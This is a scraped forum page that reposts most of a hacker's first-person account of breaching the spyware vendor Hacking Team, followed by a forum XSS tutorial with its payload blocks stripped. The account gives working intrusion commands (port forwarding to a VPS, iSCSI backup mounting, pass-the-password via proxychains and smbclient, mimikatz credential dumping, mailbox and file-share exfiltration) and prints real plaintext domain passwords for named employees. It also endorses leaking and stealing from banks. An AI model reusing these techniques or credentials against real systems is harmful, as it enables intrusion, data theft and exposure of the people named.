about my next step. I started No tienes permitido ver enlaces. Registrate o Entra a tu cuenta in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.
--[ 8 - NoSQL Databases ]-------------------------------------------------------
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
|_ version = 2.6.5
27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
...
|_ version = 2.6.5
They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 9 - Crossed Cables ]--------------------------------------------------------
Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:
Nmap scan report for No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required
Nmap scan report for No tienes permitido ver enlaces. Registrate o Entra a tu cuenta (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required
iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:
VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1
The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 10 - From backups to domain admin ]-----------------------------------------
What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient 'No tienes permitido ver enlaces. Registrate o Entra a tu cuenta' -U 'hackingteam.local/besadmin%bes32678!!!'
It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 11 - Downloading the mail ]-------------------------------------------------
With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 12 - Downloading Files ]----------------------------------------------------
Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:
proxychains smbclient 'No tienes permitido ver enlaces. Registrate o Entra a tu cuenta DiskStation' \
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.
--[ 13 - Introduction to hacking windows domains ]------------------------------
Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.
----[ 13.1 - Lateral Movement ]-------------------------------------------------
I'll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Remote Movement:
1) psexec
The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
invoke_psexec [4], or the builtin windows command "sc" [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It's the most universal method (it works on any
windows computer with port 445 open), but it's also the least stealthy.
Event type 7045 "Service Control Manager" will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.
2) WMI
The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use No tienes permitido ver enlaces. Registrate o Entra a tu cuenta [7], pth-wmis [6] (here's a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.
3) PSRemoting [10]
It's disabled by default, and I don't recommend enabling new protocols.
But, if the sysadmin has already enabled it, it's very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)
4) Scheduled Tasks
You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].
5) GPO
If all those protocols are disabled or blocked by the firewall, once you're
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we'll see with the computer of
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
open the firewall.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[12] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[13] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
"In place" Movement:
1) Token Stealing
Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].
2) MS14-068
You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].
3) Pass the Hash
If you have a user's hash, but they're not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.
4) Process Injection
Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
want.
5) runas
This is sometimes very useful since it doesn't require admin privileges.
The command is part of windows, but if you don't have a GUI you can use
powershell [8].
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 13.2 - Persistence ]------------------------------------------------------
Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
----[ 13.3 - Internal reconnaissance ]------------------------------------------
The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by it's author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:
1) Downloading a list of file names
With a Domain Admin account, you can download a list of all filenames in
the network with powerview:
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}
Later, you can read it at your leisure and choose which files to download.
2) Reading email
As we've already seen, you can download email with powershell, and it has a
lot of useful information.
3) Reading sharepoint
It's another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].
4) Active Directory [11]
It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.
5) Spy on the employees
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team's sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[10] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[11] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[12] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[13] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[14] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 14 - Hunting Sysadmins ]----------------------------------------------------
Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[3] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[4] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[5] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[6] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[7] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[8] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[9] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 15 - The bridge ]-----------------------------------------------------------
Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 16 - Reusing and resetting passwords ]--------------------------------------
Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.
--[ 17 - Conclusion ]-----------------------------------------------------------
That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.
Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.
Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
--[ 18 - Contact ]--------------------------------------------------------------
To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.
[1] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
[2] No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
only encrypted email please:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----
If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
@0xb4dc0d3
Write Preview
Leave a comment
Attach files by dragging & dropping, Elegir archivos selecting them, or pasting from the clipboard.
Styling with Markdown is supported
Comment
Contact GitHub API Training Shop Blog About
© 2017 GitHub, Inc. Terms Privacy Security Status Help
#6
Presentaciones y cumpleaños / Re:hey
Febrero 14, 2017, 06:30:34 PM
no, but I can read francais ! , nice to meet you my friend
#7
International forum / Re:Pentest bunker!
Febrero 14, 2017, 07:07:00 AM
Exploitation
Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser. The attacker does not directly target his victim. Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript for him. To the victim's browser, the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker.
How the malicious JavaScript is injected
The only way for the attacker to run his malicious JavaScript in the victim's browser is to inject it into one of the pages that the victim downloads from the website. This can happen if the website directly includes user input in its pages, because the attacker can then insert a string that will be treated as code by the victim's browser.
In the example below, a simple server-side script is used to display the latest comment on a website
The script assumes that a comment consists only of text. However, since the user input is included directly, an attacker could submit this comment: "<script>...</script>". Any user visiting the page would now receive the following response:
When the user's browser loads the page, it will execute whatever JavaScript code is contained inside the <script> tags. The attacker has now succeeded with his attack.
What is malicious JavaScript?
At first, the ability to execute JavaScript in the victim's browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.
However, the possibility of JavaScript being malicious becomes more clear when you consider the following facts:
These facts combined can cause very serious security breaches, as we will explain next.
The consequences of malicious JavaScript
Among many other things, the ability to execute arbitrary JavaScript in another user's browser allows an attacker to perform the following types of attacks:
Although these attacks differ significantly, they all have one crucial similarity: because the attacker has injected code into a page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that website: it has access to the victim's data for that website (such as cookies) and the host name shown in the URL bar will be that of the website. For all intents and purposes, the script is considered a legitimate part of the website, allowing it to do anything that the actual website can.
This fact highlights a key issue:
If an attacker can use your website to execute arbitrary JavaScript in another user's browser, the security of your website and its users has been compromised.
To emphasize this point, some examples in this tutorial will leave out the details of a malicious script by only showing <script>...</script>. This indicates that the mere presence of a script injected by the attacker is the problem, regardless of which specific code the script actually executes.
Actors in an XSS attack
Before we describe in detail how an XSS attack works, we need to define the actors involved in an XSS attack. In general, an XSS attack involves three actors: the website, the victim, and the attacker.
An example attack scenario
In this example, we will assume that the attacker's ultimate goal is to steal the victim's cookies by exploiting vulnerability in the website. This can be done by having the victim's browser parse the following HTML code:
This script navigates the user's browser to a different URL, triggering an HTTP request to the attacker's server. The URL includes the victim's cookies as a query parameter, which the attacker can extract from the request when it arrives to his server. Once the attacker has acquired the cookies, he can use them to impersonate the victim and launch further attacks.
From now on, the HTML code above will be referred to as the malicious string or the malicious script. It is important to note that the string itself is only malicious if it ultimately gets parsed as HTML in the victim's browser, which can only happen as the result of an XSS vulnerability in the website.
How the example attack works
The diagram below illustrates how this example attack can be performed by an attacker:
Types of XSS
While the goal of an XSS attack is always to execute malicious JavaScript in the victim's browser, there are few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:
The previous example illustrated a persistent XSS attack. We will now describe the other two types of XSS attacks: reflected XSS and DOM-based XSS.
Reflected XSS
In a reflected XSS attack, the malicious string is part of the victim's request to the website. The website then includes this malicious string in the response sent back to the user. The diagram below illustrates this scenario:
How can reflected XSS succeed?
At first, reflected XSS might seem harmless because it requires the victim himself to actually send a request containing a malicious string. Since nobody would willingly attack himself, there seems to be no way of actually performing the attack.
As it turns out, there are at least two common ways of causing a victim to launch a reflected XSS attack against himself:
These two methods are similar, and both can be more successful with the use of a URL shortening service, which masks the malicious string from users who might otherwise identify it.
DOM-based XSS
DOM-based XSS is a variant of both persistent and reflected XSS. In a DOM-based XSS attack, the malicious string is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. The diagram below illustrates this scenario for a reflected XSS attack:
What makes DOM-based XSS different
In the previous examples of persistent and reflected XSS attacks, the server inserts the malicious script into the page, which is then sent in a response to the victim. When the victim's browser receives the response, it assumes the malicious script to be part of the page's legitimate content and automatically executes it during page load as with any other script.
In the example of a DOM-based XSS attack, however, there is no malicious script inserted as part of the page; the only script that is automatically executed during page load is a legitimate part of the page. The problem is that this legitimate script directly makes use of user input in order to add HTML to the page. Because the malicious string is inserted into the page using innerHTML, it is parsed as HTML, causing the malicious script to be executed.
The difference is subtle but important:
Why DOM-based XSS matters
In the previous example, JavaScript was not necessary; the server could have generated all the HTML by itself. If the server-side code were free of vulnerabilities, the website would then be safe from XSS.
However, as web applications become more advanced, an increasing amount of HTML is generated by JavaScript on the client-side rather than by the server. Any time content needs to be changed without refreshing the entire page, the update must be performed using JavaScript. Most notably, this is the case when a page is updated after an AJAX request.
This means that XSS vulnerabilities can be present not only in your website's server-side code, but also in your website's client-side JavaScript code. Consequently, even with completely secure server-side code, the client-side code might still unsafely include user input in a DOM update after the page has loaded. If this happens, the client-side code has enabled an XSS attack through no fault of the server-side code.
DOM-based XSS invisible to the server
There is a special case of DOM-based XSS in which the malicious string is never sent to the website's server to begin with: when the malicious string is contained in a URL's fragment identifier (anything after the # character). Browsers do not send this part of the URL to servers, so the website has no way of accessing it using server-side code. The client-side code, however, has access to it and can thus cause XSS vulnerabilities by handling it unsafely.
This situation is not limited to fragment identifiers. Other user input that is invisible to the server includes new HTML5 features like LocalStorage and IndexedDB.
Our weapon: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
We can test XSS's in this site: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, but we need to bypass the security of the browser if we want to see any result, or of course work in blackbox ! ...
Okay it's great ! but I'll present you another friend, it's No tienes permitido ver enlaces. Registrate o Entra a tu cuenta ... weird site but it's safe , don't worry, because I'm a good guy, I'll put the interesting links because I understand japanese is not ur natural language haha...
Tools
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Testing side
And we can obtain information of interesting XSS techniques, like No tienes permitido ver enlaces. Registrate o Entra a tu cuenta and moar
#XSS Payload Scheme
[/list][/list][/list]Código: text
#Agnostic Event Handlers
Código: text
#Filter Bypass procedure
Código: text
#Probing to Find XSS
Código: text
#Location Based Payloads – Part I
Código: text
#Location Based Payloads – Part II
Código: text
#Location Based Payloads – Part III
Código: text
#Location Based Payloads – Part IV
Código: text
#Using XSS to Control a Browser
Código: text
#Multi Reflection XSS
Código: text
#XSS Without Event Handlers
Código: text
#Transcending Context-Based Filters
Código: text
Credits to No tienes permitido ver enlaces. Registrate o Entra a tu cuenta document and @tfaraine
- XSS
Cross-site Scripting
What is XSS?
Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser. The attacker does not directly target his victim. Instead, he exploits a vulnerability in a website that the victim visits, in order to get the website to deliver the malicious JavaScript for him. To the victim's browser, the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker.
How the malicious JavaScript is injected
The only way for the attacker to run his malicious JavaScript in the victim's browser is to inject it into one of the pages that the victim downloads from the website. This can happen if the website directly includes user input in its pages, because the attacker can then insert a string that will be treated as code by the victim's browser.
In the example below, a simple server-side script is used to display the latest comment on a website
The script assumes that a comment consists only of text. However, since the user input is included directly, an attacker could submit this comment: "<script>...</script>". Any user visiting the page would now receive the following response:
When the user's browser loads the page, it will execute whatever JavaScript code is contained inside the <script> tags. The attacker has now succeeded with his attack.
What is malicious JavaScript?
At first, the ability to execute JavaScript in the victim's browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you could open your browser's JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.
However, the possibility of JavaScript being malicious becomes more clear when you consider the following facts:
- JavaScript has access to some of the user's sensitive information, such as cookies.
- JavaScript can make arbitrary modifications to the HTML of the current page by using DOM manipulation methods.
- JavaScript can send HTTP requests with arbitrary content to arbitrary destinations by using XMLHttpRequest and other mechanisms.
These facts combined can cause very serious security breaches, as we will explain next.
The consequences of malicious JavaScript
Among many other things, the ability to execute arbitrary JavaScript in another user's browser allows an attacker to perform the following types of attacks:
- Cookie theft The attacker can access the victim's cookies associated with the website using document.cookie, send them to his own server, and use them to extract sensitive information like session IDs.
